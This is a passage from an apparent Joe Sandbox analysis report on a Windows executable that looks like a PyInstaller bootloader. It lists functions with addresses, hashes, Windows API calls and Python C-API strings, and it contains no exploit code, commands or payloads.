                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                    • Instruction ID: 502ae27ed876f42434a1653eca015659a723e0e93e0846f74c41cc4db3e204bd
                                                    • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                    • Instruction Fuzzy Hash: 2B11D821A0C6A341EE649F119C1027DA3A0BF96B88F5C4039EA8CE7796DFBED4008740
                                                    Function 00007FF652EF748C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                    • Instruction ID: 4a1074f9b3cffe1422d503fc7bf9ec147f3374a5b988c7945da139c3c503f9fa
                                                    • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                    • Instruction Fuzzy Hash: 5621A772A18A5246DB618F18F85037A77A1EB84B98F584238E65DD76D9DF7CD801CB00
                                                    Function 00007FF652EE0CEC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                    • Instruction ID: 37fa9f3cf19230278f6c098612e758b13bed30dfd683c6c9727a03ce544ec5fc
                                                    • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                    • Instruction Fuzzy Hash: 2501C861A0876342EA05DB52AC0007DA7A5BF46FE8F4C4639DE5CB7BDADEBDE1018300
                                                    Function 00007FF652EEF948 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF652EEC196,?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6), ref: 00007FF652EEF99D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                    • Instruction ID: f2df9a9c7ede13a890edcfa90dfe153f4e4428a6de6420e531c66e5acef6bcf3
                                                    • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                    • Instruction Fuzzy Hash: EEF02401F0A72391FE5457E1AC603B512904FA8B88F4C443CCD4EFA3C5EEDDE4808212
                                                    Function 00007FF652EEE3AC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF652EE1514,?,?,?,00007FF652EE2A26,?,?,?,?,?,00007FF652EE4019), ref: 00007FF652EEE3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                    • Instruction ID: 3bb638fbe0fcaf54c0b356accb4c4e198088ae9a25376b0f5b1d5e079077cef2
                                                    • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                    • Instruction Fuzzy Hash: EBF01211F1E2B745FE5867A16C516BA51914F487B8F0C0638DD2EE67C1DEDCE481C111

                                                    Non-executed Functions

                                                    Function 00007FF652ED53F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                    • API String ID: 190572456-4266016200
                                                    • Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                    • Instruction ID: 3ee331b5a643e14599949abbb94bbcbdeee16feef1ad8d817a891e57cf5b6386
                                                    • Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                    • Instruction Fuzzy Hash: A412CE65A5AB2390FB15CB04BC901B527A1AF9474DF9C603DC80FB62A4EFFCF6599201
                                                    Function 00007FF652EF4EFC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 808467561-2761157908
                                                    • Opcode ID: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                    • Instruction ID: 3e03a4fa98c9d518ec9d46048902a24b9d644fa78f0713f8f9a6b9e9f04d28a7
                                                    • Opcode Fuzzy Hash: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                    • Instruction Fuzzy Hash: D2B2BB72E182A28BE7658F64E8807FE37A1F75474CF585139DA0DA7A84DFB8E501CB40
                                                    Function 00007FF652ED8770 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00007FF652ED2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8797
                                                    • FormatMessageW.KERNEL32 ref: 00007FF652ED87C6
                                                    • WideCharToMultiByte.KERNEL32 ref: 00007FF652ED881C
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                    • API String ID: 2920928814-2573406579
                                                    • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                    • Instruction ID: 51bf71cd7a72d6edf52f2de382c44d5a32179a567de33a4a0b08b3ec0b121830
                                                    • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                    • Instruction Fuzzy Hash: AD214F32A18A5295F760DB25FC4426A6365FF8838CF8C113DD64DE3AA5EFBCE1458700
                                                    Function 00007FF652EDC8BC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                    • Instruction ID: 9c9fddb7a2417419a48a1308490ecb0dc1d38454205676199610756d93eef377
                                                    • Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                    • Instruction Fuzzy Hash: 11313C73619A9186EB60DF60E8407EE7364FB84748F08503EDA4EA7B94DF78D648C710
                                                    Function 00007FF652EEB3CC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                    • Instruction ID: 1bee17907e66fc859bffdbd4139d153215a69385482ffacc9c98ce8ffdfcedbb
                                                    • Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                    • Instruction Fuzzy Hash: 33318736618F9285E760CF25EC402AE73A5FB88758F580139EA8DA3B54EF7CD559C700
                                                    Function 00007FF652EF26C4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                    • Instruction ID: 215221bfaeb12fdb2ba672aa94483a260886313c4c31a514e5c5c7e20fad7ffe
                                                    • Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                    • Instruction Fuzzy Hash: 73B1A526B186A741EE61DB25BC101BA6351FB44BE8F48513AEE5DA7BC9DFBCE441C300
                                                    Function 00007FF652EDC7A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                    • Instruction ID: ee7c2f503427e826740fe495d2ad8bfad4ed126e8cc47d65c1cca5953b15be88
                                                    • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                    • Instruction Fuzzy Hash: 60114822B54F018AEB00CF60FC442A933A4FB18B58F081E35DA6DA27A4DFB8E1588340
                                                    Function 00007FF652EF4A60 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: memcpy_s
                                                    • String ID:
                                                    • API String ID: 1502251526-0
                                                    • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction ID: 8429646ca80192e79eddfa1bd9a4f3a0c48c5aec866a0cf9079fe7ebef69365b
                                                    • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                    • Instruction Fuzzy Hash: B8C12772B1869687E724CF19B4446ABB7A1F784B88F499138DB4E97744DF7DE801CB00
                                                    Function 00007FF652EFA7D8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    • Opcode ID: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                    • Instruction ID: 76c3338278c15cc10c43618707dbdac86042215a26cfa29692d999d4f47ce9bb
                                                    • Opcode Fuzzy Hash: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                    • Instruction Fuzzy Hash: 39B18A73A04B998BEB15CF29D8863693BA0F744B8CF198829DA9D877A4CF79D451C700
                                                    Function 00007FF652EE42D4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-227171996
                                                    • Opcode ID: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
                                                    • Instruction ID: adc81b12121d56f9e4311b80ef1d43569e8048f9adb0fd5a825dbbd610baf62a
                                                    • Opcode Fuzzy Hash: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
                                                    • Instruction Fuzzy Hash: 4AE1B272A0866782EB688F29985017D33A0FF45B8CF1C523DDA4EA7794DFB9E851C740
                                                    Function 00007FF652EEECA0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e+000$gfff
                                                    • API String ID: 0-3030954782
                                                    • Opcode ID: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
                                                    • Instruction ID: c5f9d83ac982cff2513306bede21afd74380d2475158dfbca02737a5c39b2390
                                                    • Opcode Fuzzy Hash: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
